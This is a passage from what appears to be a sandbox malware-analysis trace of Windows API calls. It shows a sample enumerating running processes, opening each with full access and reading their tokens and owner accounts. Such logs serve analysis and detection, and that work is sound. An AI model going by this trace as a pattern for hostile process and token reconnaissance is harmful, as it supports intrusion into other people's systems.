[4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.692] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.693] CloseHandle (hObject=0x240) returned 1 [0124.693] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="threateningscriptingleu.exe")) returned 1 [0124.693] SetLastError (dwErrCode=0x0) [0124.693] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1c4) returned 0x240 [0124.694] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x26c) returned 1 [0124.694] GetTokenInformation (in: TokenHandle=0x26c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.694] GetTokenInformation (in: TokenHandle=0x26c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.694] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.694] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.695] CloseHandle (hObject=0x240) returned 1 [0124.695] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="causing-weights.exe")) returned 1 [0124.695] SetLastError (dwErrCode=0x0) [0124.695] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x5ac) returned 0x240 [0124.695] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x270) returned 1 [0124.695] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.695] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.695] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.696] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.696] CloseHandle (hObject=0x240) returned 1 [0124.696] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="positioning-vacancies.exe")) returned 1 [0124.697] SetLastError (dwErrCode=0x0) [0124.697] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x248) returned 0x240 [0124.697] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x274) returned 1 [0124.697] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.697] GetTokenInformation (in: TokenHandle=0x274, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.697] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.697] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.698] CloseHandle (hObject=0x240) returned 1 [0124.698] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="describing_putting.exe")) returned 1 [0124.699] SetLastError (dwErrCode=0x0) [0124.699] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x704) returned 0x240 [0124.699] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x278) returned 1 [0124.699] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.699] GetTokenInformation (in: TokenHandle=0x278, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.699] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.699] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.700] CloseHandle (hObject=0x240) returned 1 [0124.700] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fivjf.exe")) returned 1 [0124.700] SetLastError (dwErrCode=0x0) [0124.700] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x954) returned 0x240 [0124.700] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x27c) returned 1 [0124.700] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.700] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.700] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.701] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.701] CloseHandle (hObject=0x240) returned 1 [0124.701] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0124.702] SetLastError (dwErrCode=0x0) [0124.702] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xb44) returned 0x240 [0124.702] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x27c) returned 0 [0124.702] CloseHandle (hObject=0x240) returned 1 [0124.702] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.703] SetLastError (dwErrCode=0x0) [0124.703] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1188) returned 0x240 [0124.703] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x27c) returned 0 [0124.703] CloseHandle (hObject=0x240) returned 1 [0124.703] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x13a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0124.703] SetLastError (dwErrCode=0x0) [0124.703] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x13a4) returned 0x240 [0124.703] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x27c) returned 0 [0124.703] CloseHandle (hObject=0x240) returned 1 [0124.703] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0124.704] SetLastError (dwErrCode=0x0) [0124.704] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xbac) returned 0x240 [0124.704] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x27c) returned 0 [0124.704] CloseHandle (hObject=0x240) returned 1 [0124.704] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1 [0124.705] SetLastError (dwErrCode=0x0) [0124.705] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x12b0) returned 0x240 [0124.705] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x280) returned 1 [0124.705] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.705] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.705] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.705] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.706] CloseHandle (hObject=0x240) returned 1 [0124.706] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.707] SetLastError (dwErrCode=0x0) [0124.707] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xf90) returned 0x240 [0124.707] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x284) returned 1 [0124.707] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.707] GetTokenInformation (in: TokenHandle=0x284, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.707] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.707] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.708] CloseHandle (hObject=0x240) returned 1 [0124.708] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1 [0124.708] SetLastError (dwErrCode=0x0) [0124.708] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xf10) returned 0x240 [0124.708] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x288) returned 1 [0124.708] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.708] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.708] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.709] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b5190, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.709] CloseHandle (hObject=0x240) returned 1 [0124.709] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.710] SetLastError (dwErrCode=0x0) [0124.710] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x6f0) returned 0x240 [0124.710] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x28c) returned 1 [0124.710] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.710] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.710] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.710] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a490, cchName=0x10ddd8, ReferencedDomainName=0x2b51d0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.711] CloseHandle (hObject=0x240) returned 1 [0124.711] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xec0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1 [0124.712] SetLastError (dwErrCode=0x0) [0124.712] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xec0) returned 0x240 [0124.712] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x290) returned 1 [0124.712] GetTokenInformation (in: TokenHandle=0x290, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.712] GetTokenInformation (in: TokenHandle=0x290, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 1 [0124.712] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name=0x0, cchName=0x10ddd8, ReferencedDomainName=0x0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 0 [0124.712] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x24a3a0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x24a850, cchName=0x10ddd8, ReferencedDomainName=0x2b50f0, cchReferencedDomainName=0x10ddd4, peUse=0x10dddc | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x10ddd8, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x10ddd4, peUse=0x10dddc) returned 1 [0124.713] CloseHandle (hObject=0x240) returned 1 [0124.713] Process32NextW (in: hSnapshot=0x90, lppe=0x10ddf0 | out: lppe=0x10ddf0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0124.713] SetLastError (dwErrCode=0x0) [0124.713] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x1010) returned 0x240 [0124.713] OpenProcessToken (in: ProcessHandle=0x240, DesiredAccess=0x20008, TokenHandle=0x10dde0 | out: TokenHandle=0x10dde0*=0x294) returned 1 [0124.713] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x0, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, ReturnLength=0x10ddd0) returned 0 [0124.713] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x1, TokenInformation=0x24a390, TokenInformationLength=0x2c, ReturnLength=0x10ddd0 | out: TokenInformation=0x24a390, 